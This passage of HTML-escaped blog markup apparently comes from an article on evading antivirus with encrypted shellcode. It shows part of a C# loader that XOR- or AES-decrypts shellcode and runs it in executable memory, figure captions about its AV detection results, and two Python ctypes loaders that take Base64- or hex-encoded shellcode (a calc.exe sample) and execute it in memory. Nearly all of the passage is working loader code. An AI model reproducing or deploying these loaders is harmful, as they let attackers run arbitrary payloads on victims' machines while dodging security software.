                &lt;span class="n"&gt;shellcode&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;xor&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;encryptedShellcode&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;Encoding&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ASCII&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;GetBytes&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt;
            &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cipherType&lt;/span&gt; &lt;span class="p"&gt;==&lt;/span&gt; &lt;span class="s"&gt;"aes"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="n"&gt;shellcode&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;aesDecrypt&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;encryptedShellcode&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;Convert&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;FromBase64String&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt;

            &lt;span class="c1"&gt;//--------------------------------------------------------------            &lt;/span&gt;
            &lt;span class="c1"&gt;// Copy decrypted shellcode to memory&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;funcAddr&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;VirtualAlloc&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;UInt32&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Length&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;MEM_COMMIT&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;PAGE_EXECUTE_READWRITE&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="n"&gt;Marshal&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;Copy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;IntPtr&lt;/span&gt;&lt;span class="p"&gt;)(&lt;/span&gt;&lt;span class="n"&gt;funcAddr&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Length&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="n"&gt;IntPtr&lt;/span&gt; &lt;span class="n"&gt;hThread&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="n"&gt;IntPtr&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Zero&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;threadId&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

            &lt;span class="c1"&gt;// Prepare data&lt;/span&gt;
            &lt;span class="n"&gt;IntPtr&lt;/span&gt; &lt;span class="n"&gt;pinfo&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="n"&gt;IntPtr&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Zero&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

            &lt;span class="c1"&gt;// Invoke the shellcode&lt;/span&gt;
            &lt;span class="n"&gt;hThread&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;CreateThread&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;funcAddr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;pinfo&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;ref&lt;/span&gt; &lt;span class="n"&gt;threadId&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="nf"&gt;WaitForSingleObject&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hThread&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="m"&gt;0xFFFFFFFF&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;

        &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;MEM_COMMIT&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="m"&gt;0x1000&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;PAGE_EXECUTE_READWRITE&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="m"&gt;0x40&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

        &lt;span class="c1"&gt;// The usual Win32 API trio functions: VirtualAlloc, CreateThread, WaitForSingleObject&lt;/span&gt;
        &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nf"&gt;DllImport&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"kernel32"&lt;/span&gt;&lt;span class="p"&gt;)]&lt;/span&gt;
        &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;extern&lt;/span&gt; &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="nf"&gt;VirtualAlloc&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;lpStartAddr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;size&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;flAllocationType&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;flProtect&lt;/span&gt;
        &lt;span class="p"&gt;);&lt;/span&gt;

        &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nf"&gt;DllImport&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"kernel32"&lt;/span&gt;&lt;span class="p"&gt;)]&lt;/span&gt;
        &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;extern&lt;/span&gt; &lt;span class="n"&gt;IntPtr&lt;/span&gt; &lt;span class="nf"&gt;CreateThread&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;lpThreadAttributes&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;dwStackSize&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;lpStartAddress&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;IntPtr&lt;/span&gt; &lt;span class="n"&gt;param&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;dwCreationFlags&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="k"&gt;ref&lt;/span&gt; &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;lpThreadId&lt;/span&gt;
        &lt;span class="p"&gt;);&lt;/span&gt;

        &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nf"&gt;DllImport&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"kernel32"&lt;/span&gt;&lt;span class="p"&gt;)]&lt;/span&gt;
        &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;extern&lt;/span&gt; &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="nf"&gt;WaitForSingleObject&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
            &lt;span class="n"&gt;IntPtr&lt;/span&gt; &lt;span class="n"&gt;hHandle&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;dwMilliseconds&lt;/span&gt;
        &lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



  &lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fo42st6e2g58ddmqpzx4x.png" alt="Figure 13: XOR-encrypted shellcode C# loader implementation" width="800" height="522"&gt;Figure 13: XOR-encrypted shellcode C# loader implementation
  



  &lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F0l61b53i8872cbw236l4.png" alt="Figure 14: AV detection results for XOR-encrypted shellcode" width="799" height="494"&gt;Figure 14: AV detection results for XOR-encrypted shellcode
  


&lt;p&gt;The same principles apply to other programming languages. For instance, &lt;strong&gt;Python&lt;/strong&gt; supports XOR encoding, Base64, and hexadecimal encoding, among others.&lt;/p&gt;
&lt;h4&gt;
  
  
  Python Base64 Example (k8gege):
&lt;/h4&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;ctypes&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;sys&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;base64&lt;/span&gt;
&lt;span class="c1"&gt;#calc.exe
#REJDM0Q5NzQyNEY0QkVFODVBMjcxMzVGMzFDOUIxMzMzMTc3MTc4M0M3MDQwMzlGNDlDNUU2QTM4NjgwMDk1QjU3RjM4MEJFNjYyMUY2Q0JEQkY1N0M5OUQ3N0VEMDA5NjNGMkZEM0VDNEI5REI3MUQ1MEZFNEREMTUxMTk4MUY0QUYxQTFEMDlGRjBFNjBDNkZBMEJGNUJDMjU1Q0IxOURGNTQxQjE2NUYyRjFFRTgxNDg1MjEzODg0OTI2QUEwQUVGRDRBRDE2MzFFQjY5ODA4RDU0QzFCRDkyN0FDMkEyNUVCOTM4M0E4RjVENDIzNTM4MDJFNTBFRTkzRjQyQjM0MTFFOThCQkY4MUM5MkExMzU3OTkyMEQ4MTNDNTI0REZGMDdENTA1NEY3NTFEMTJFREM3NUJBRjU3RDJGNjY1QjgxMkZDRTA0MjczQkZDNTE1MTY2NkFBN0QzMUNEM0E3RUIxRTczQzBEQTk1MUM5N0UyN0Y1OTY3QTkyMkNCRTA3NEI3NEU2RDg3NkQ4Qzg4MDQ4NDZDNkYxNEVENjkyQjkyMUQwMzI0NzcyMkIwNDU1MjQxNTdENjNFQThGMjVFQTRCNA==
&lt;/span&gt;&lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nf"&gt;bytearray&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;base64&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;b64decode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;]).&lt;/span&gt;&lt;span class="nf"&gt;decode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;hex&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
&lt;span class="n"&gt;ptr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;windll&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;kernel32&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;VirtualAlloc&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
                                          &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;)),&lt;/span&gt;
                                          &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mh"&gt;0x3000&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
                                          &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mh"&gt;0x40&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;

&lt;span class="n"&gt;buf&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;c_char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;)).&lt;/span&gt;&lt;span class="nf"&gt;from_buffer&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;windll&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;kernel32&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;RtlMoveMemory&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ptr&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
                                     &lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                                     &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;)))&lt;/span&gt;

&lt;span class="n"&gt;ht&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;windll&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;kernel32&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;CreateThread&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
                                         &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
                                         &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ptr&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
                                         &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
                                         &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
                                         &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;pointer&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)))&lt;/span&gt;

&lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;windll&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;kernel32&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;WaitForSingleObject&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ht&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;&lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h4&gt;
  
  
  Python Hexadecimal Example:
&lt;/h4&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;ctypes&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;sys&lt;/span&gt;
&lt;span class="c1"&gt;#calc.exe
#sc = "DBC3D97424F4BEE85A27135F31C9B13331771783C704039F49C5E6A38680095B57F380BE6621F6CBDBF57C99D77ED00963F2FD3EC4B9DB71D50FE4DD1511981F4AF1A1D09FF0E60C6FA0BF5BC255CB19DF541B165F2F1EE81485213884926AA0AEFD4AD1631EB69808D54C1BD927AC2A25EB9383A8F5D42353802E50EE93F42B3411E98BBF81C92A13579920D813C524DFF07D5054F751D12EDC75BAF57D2F665B812FCE04273BFC5151666AA7D31CD3A7EB1E73C0DA951C97E27F5967A922CBE074B74E6D876D8C8804846C6F14ED692B921D03247722B045524157D63EA8F25EA4B4"
&lt;/span&gt;&lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nf"&gt;bytearray&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="nf"&gt;decode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;hex&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
&lt;span class="n"&gt;ptr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;windll&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;kernel32&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;VirtualAlloc&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
                                          &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;)),&lt;/span&gt;
                                          &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mh"&gt;0x3000&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
                                          &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mh"&gt;0x40&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;

&lt;span class="n"&gt;buf&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;c_char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;)).&lt;/span&gt;&lt;span class="nf"&gt;from_buffer&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;windll&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;kernel32&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;RtlMoveMemory&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ptr&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
                                     &lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                                     &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;)))&lt;/span&gt;

&lt;span class="n"&gt;ht&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;windll&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;kernel32&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;CreateThread&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
                                         &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
                                         &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ptr&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
                                         &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
